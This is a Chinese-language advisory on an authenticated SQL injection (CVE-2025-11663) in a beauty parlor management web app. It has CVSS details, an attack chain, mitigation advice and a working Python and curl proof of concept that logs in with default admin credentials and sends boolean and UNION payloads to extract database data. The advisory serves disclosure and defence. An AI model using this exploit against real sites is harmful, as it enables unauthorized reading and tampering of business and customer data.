CVE-2025-11663：Campcodes美容管理系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-11663

漏洞类型

SQL注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Campcodes Online Beauty Parlor Management System

漏洞概述

CVE-2025-11663是Campcodes Online Beauty Parlor Management System 1.0版本中存在的SQL注入漏洞。该漏洞位于/admin/manage-services.php文件中，具体涉及对参数sername的处理逻辑存在缺陷。攻击者可通过构造恶意的SQL语句注入到该参数中，从而实现对后端数据库的未授权操作。

该漏洞的CVSS 3.1评分为4.7，属于中危级别。虽然漏洞利用需要高权限（PR:H），但攻击可通过网络远程发起（AV:N），且无需用户交互（UI:N），攻击复杂度较低（AC:L）。一旦成功利用，攻击者能够对数据库的机密性、完整性和可用性均造成低级别的影响（C:L/I:L/A:L）。

Campcodes Online Beauty Parlor Management System是一款用于美容沙龙管理的Web应用程序，包含服务管理、客户管理、预约管理等功能模块。由于该漏洞影响管理员后台的关键功能文件manage-services.php，可能导致敏感业务数据（如服务信息、客户数据等）泄露或被篡改。该漏洞的利用代码已在GitHub等公开渠道发布，存在被恶意利用的实际风险。

技术细节

该漏洞的根因在于/admin/manage-services.php文件在处理sername参数时，未对该参数进行充分的输入验证和参数化处理，直接将用户输入拼接到SQL查询语句中执行，从而形成了SQL注入漏洞。

从技术层面分析，manage-services.php作为服务管理模块的后台处理脚本，负责对美容服务信息进行查询、修改或删除等操作。在处理用户请求时，sername参数被用于构造类似如下的SQL查询：

SELECT * FROM services WHERE sername = '$sername'

由于缺少对单引号等特殊字符的转义以及预编译语句的使用，攻击者可以构造如下的恶意payload：

' OR '1'='1' --

或者使用更复杂的UNION注入语句来提取数据库中的敏感信息。由于该漏洞需要高权限（PR:H）才能利用，攻击者通常需要先获取管理员账号的访问权限（如通过钓鱼、暴力破解或其他途径），然后才能在已认证的管理员会话中执行注入攻击。

漏洞利用成功后，攻击者可以：1）绕过正常的管理功能验证；2）读取数据库中的敏感信息；3）通过堆叠查询或特定数据库特性修改或删除数据；4）在特定配置下可能实现远程代码执行。

攻击链分析

STEP 1

步骤1：信息收集

攻击者首先识别目标系统为Campcodes Online Beauty Parlor Management System 1.0，通过目录扫描或指纹识别确认/admin/manage-services.php文件存在。

STEP 2

步骤2：获取管理员权限

由于漏洞利用需要高权限（PR:H），攻击者通过钓鱼、暴力破解、默认凭据或其他途径获取管理员账号的访问权限。

STEP 3

步骤3：构造注入Payload

攻击者构造恶意的SQL注入payload，如' OR '1'='1' -- 或基于UNION的注入语句，用于sername参数。

STEP 4

步骤4：发送恶意请求

在已认证的管理员会话中，攻击者向/admin/manage-services.php发送包含恶意sername参数的请求。

STEP 5

步骤5：数据库信息提取

通过注入攻击，攻击者读取数据库中的敏感信息，如管理员凭据、客户数据、服务信息等。

STEP 6

步骤6：数据篡改或破坏

利用注入漏洞执行UPDATE/DELETE语句，篡改或删除业务数据，破坏系统完整性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11663 PoC - SQL Injection in Campcodes Online Beauty Parlor Management System
# Vulnerable file: /admin/manage-services.php
# Vulnerable parameter: sername

import requests

# Target configuration
TARGET_URL = "http://target-site.com"
ADMIN_PATH = "/admin/manage-services.php"
USERNAME = "admin"
PASSWORD = "admin123"

# Create a session to maintain cookies
session = requests.Session()

# Step 1: Login as admin (required due to PR:H - High privileges required)
login_url = f"{TARGET_URL}/admin/index.php"
login_data = {
    "username": USERNAME,
    "password": PASSWORD,
    "submit": "Login"
}

try:
    # Perform login
    response = session.post(login_url, data=login_data, verify=False)
    print(f"[*] Login response status: {response.status_code}")

    # Step 2: Exploit SQL injection via 'sername' parameter
    # Basic boolean-based injection test
    sqli_payload = "' OR '1'='1' -- "
    exploit_url = f"{TARGET_URL}{ADMIN_PATH}"
    exploit_params = {
        "sername": sqli_payload,
        "search": "Search"
    }

    response = session.get(exploit_url, params=exploit_params, verify=False)
    print(f"[*] Exploit response status: {response.status_code}")

    # Step 3: Extract database information using UNION-based injection
    # First determine number of columns
    for i in range(1, 15):
        cols = ",".join([str(x) for x in range(1, i+1)])
        union_payload = f"' UNION SELECT {cols}-- "
        params = {"sername": union_payload, "search": "Search"}
        r = session.get(exploit_url, params=params, verify=False)
        if r.status_code == 200 and "error" not in r.text.lower():
            print(f"[+] Number of columns: {i}")
            break

    # Step 4: Extract database version and current user
    extract_payload = f"' UNION SELECT {cols}-- "
    # Replace last column with database() or version()
    extract_cols = ",".join([str(x) for x in range(1, i)])
    extract_payload = f"' UNION SELECT {extract_cols},version()-- "
    params = {"sername": extract_payload, "search": "Search"}
    r = session.get(exploit_url, params=params, verify=False)
    print(f"[*] Database version response:\n{r.text[:500]}")

except Exception as e:
    print(f"[-] Error: {e}")

# Alternative: Manual curl-based exploitation
# curl -X POST "http://target/admin/manage-services.php" \
#   -b "PHPSESSID=your_session_cookie" \
#   -d "sername=' OR '1'='1' -- &search=Search"

影响范围

Campcodes Online Beauty Parlor Management System 1.0

防御指南

临时缓解措施

在等待官方修复版本发布之前，建议采取以下临时缓解措施：1）通过WAF规则拦截对/admin/manage-services.php文件中sername参数的SQL注入攻击特征；2）对manage-services.php文件实施访问控制，限制仅特定IP地址可访问；3）修改管理员密码并启用强密码策略及双因素认证；4）在数据库层面，对涉及sername参数的查询进行审计日志记录，及时发现异常访问行为；5）考虑暂时禁用服务管理功能或使用其他临时方案替代。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11663
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11663
3 Details https://www.cvedetails.com/cve/CVE-2025-11663/
4 VulDB https://vuldb.com/cve/CVE-2025-11663
5 Link https://github.com/HYLCXH/CVE/issues/12
6 Link https://vuldb.com/?ctiid.328082
7 Link https://vuldb.com/?id.328082
8 Link https://vuldb.com/?submit.672848
9 Link https://www.campcodes.com/